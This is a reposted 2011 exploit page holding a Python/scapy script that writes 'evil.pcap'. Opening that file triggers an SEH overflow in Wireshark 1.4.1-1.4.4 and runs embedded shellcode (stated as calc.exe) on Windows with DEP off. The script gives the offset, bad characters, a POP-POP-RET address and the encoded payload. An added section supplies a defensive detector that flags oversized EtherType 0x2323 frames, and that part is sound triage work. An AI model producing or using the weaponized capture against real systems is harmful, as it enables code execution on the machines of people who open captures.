Wireshark 1.4.1-1.4.4 SEH Overflow Exploit
Source: vfocus.net  Author: sickness  Published: 2011-04-19

#!/usr/bin/env python
# Vulnerable app: Wireshark 1.4.1-1.4.4
# Author: sickness
# Download :
# OS: Tested it on Windows XP SP2 and SP3 but it should work on every Windows with DEP off (still working on a ROP exploit)
# DATE   : 17.04.2011
# Fixed in latest version 1.4.5
# DO NOT FORGET TO FEEL THE PWNSAUCE WITH: http://redmine.corelan.be:8800/projects/pvefindaddr
###################################################################
# Offset might change!
# Watch out for other bad chars!!
# Current bad chars: \x00\x0a\x0d\x09
###################################################################
# References:
# https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836
# https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838
###################################################################


import sys
from scapy.all import *

#payload=calc.exe
#ppr is from a non-ASLR enabled wireshark module

evil = Ether(type=0x2323)/("\x41" * 1239 + "\xeb\x06\x90\x90" +  "\x5D\x10\x94\x62" + "\x90" * 16 + "\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x17\x22\xfd\x6a\x83\xee\xfc\xe2\xf4\xeb\xca\x74\x6a\x17\x22\x9d\xe3\xf2\x13\x2f\x0e\x9c\x70\xcd\xe1\x45\x2e\x76\x38\x03\xa9\x8f\x42\x18\x95\xb7\x4c\x26\xdd\xcc\xaa\xbb\x1e\x9c\x16\x15\x0e\xdd\xab\xd8\x2f\xfc\xad\xf5\xd2\xaf\x3d\x9c\x70\xed\xe1\x55\x1e\xfc\xba\x9c\x62\x85\xef\xd7\x56\xb7\x6b\xc7\x72\x76\x22\x0f\xa9\xa5\x4a\x16\xf1\x1e\x56\x5e\xa9\xc9\xe1\x16\xf4\xcc\x95\x26\xe2\x51\xab\xd8\x2f\xfc\xad\x2f\xc2\x88\x9e\x14\x5f\x05\x51\x6a\x06\x88\x88\x4f\xa9\xa5\x4e\x16\xf1\x9b\xe1\x1b\x69\x76\x32\x0b\x23\x2e\xe1\x13\xa9\xfc\xba\x9e\x66\xd9\x4e\x4c\x79\x9c\x33\x4d\x73\x02\x8a\x4f\x7d\xa7\xe1\x05\xc9\x7b\x37\x7d\x23\x70\xef\xae\x22\xfd\x6a\x47\x4a\xcc\xe1\x78\xa5\x02\xbf\xac\xd2\x48\xc8\x41\x4a\x5b\xff\xaa\xbf\x02\xbf\x2b\x24\x81\x60\x97\xd9\x1d\x1f\x12\x99\xba\x79\x65\x4d\x97\x6a\x44\xdd\x28\x09\x76\x4e\x9e\x44\x72\x5a\x98\x6a" + "\x90" * 4500)
wrpcap("evil.pcap",evil)


print "\n"
print "Evil .pcap file created!"
print "It's pwnsauce time!\n"
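
For triage, a capture can be checked for this frame shape without opening it in a vulnerable Wireshark build. The following is an added example, not part of the original script or of Wireshark: it reads a classic pcap file and reports frames that carry EtherType 0x2323 with an unusually long payload. The names `suspicious_frames` and `build_sample` are hypothetical, and the 1239-byte threshold is an assumption taken from the filler length in the script above.

```python
import struct

TARGET_ETHERTYPE = 0x2323  # EtherType set by the script above
MAX_PAYLOAD = 1239         # assumption: alert above the script's 1239-byte filler run

def suspicious_frames(pcap, ethertype=TARGET_ETHERTYPE, max_payload=MAX_PAYLOAD):
    """Return [(frame_number, payload_len)] for oversized frames of `ethertype`.

    Reads a classic libpcap file (not pcapng) byte by byte; nothing is dissected.
    """
    if len(pcap) < 24:
        raise ValueError("truncated pcap global header")
    if pcap[:4] in (b"\xd4\xc3\xb2\xa1", b"\x4d\x3c\xb2\xa1"):
        endian = "<"
    elif pcap[:4] in (b"\xa1\xb2\xc3\xd4", b"\xa1\xb2\x3c\x4d"):
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    if struct.unpack(endian + "I", pcap[20:24])[0] != 1:  # 1 = LINKTYPE_ETHERNET
        raise ValueError("only Ethernet captures are handled")
    hits, offset, number = [], 24, 0
    while offset + 16 <= len(pcap):
        incl_len, orig_len = struct.unpack(endian + "II", pcap[offset + 8:offset + 16])
        frame = pcap[offset + 16:offset + 16 + incl_len]
        offset += 16 + incl_len
        number += 1
        if len(frame) < 14:
            continue  # too short to carry an Ethernet header
        etype = struct.unpack("!H", frame[12:14])[0]
        # orig_len covers frames cut short by the capture snaplen
        payload_len = max(orig_len, len(frame)) - 14
        if etype == ethertype and payload_len > max_payload:
            hits.append((number, payload_len))
    return hits

def build_sample():
    """Constructed capture: IPv4 frame, small 0x2323 frame, oversized 0x2323 frame."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for etype, size in ((0x0800, 46), (0x2323, 100), (0x2323, 2000)):
        frame = b"\xff" * 6 + b"\x02" + b"\x00" * 5 + struct.pack("!H", etype) + b"\x00" * size
        out += struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    return out

if __name__ == "__main__":
    for number, length in suspicious_frames(build_sample()):
        print("frame %d: EtherType 0x%04x, %d payload bytes" % (number, TARGET_ETHERTYPE, length))
```

A hit is a reason to keep the file away from Wireshark 1.4.1-1.4.4; the script header states the issue is fixed in 1.4.5.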


 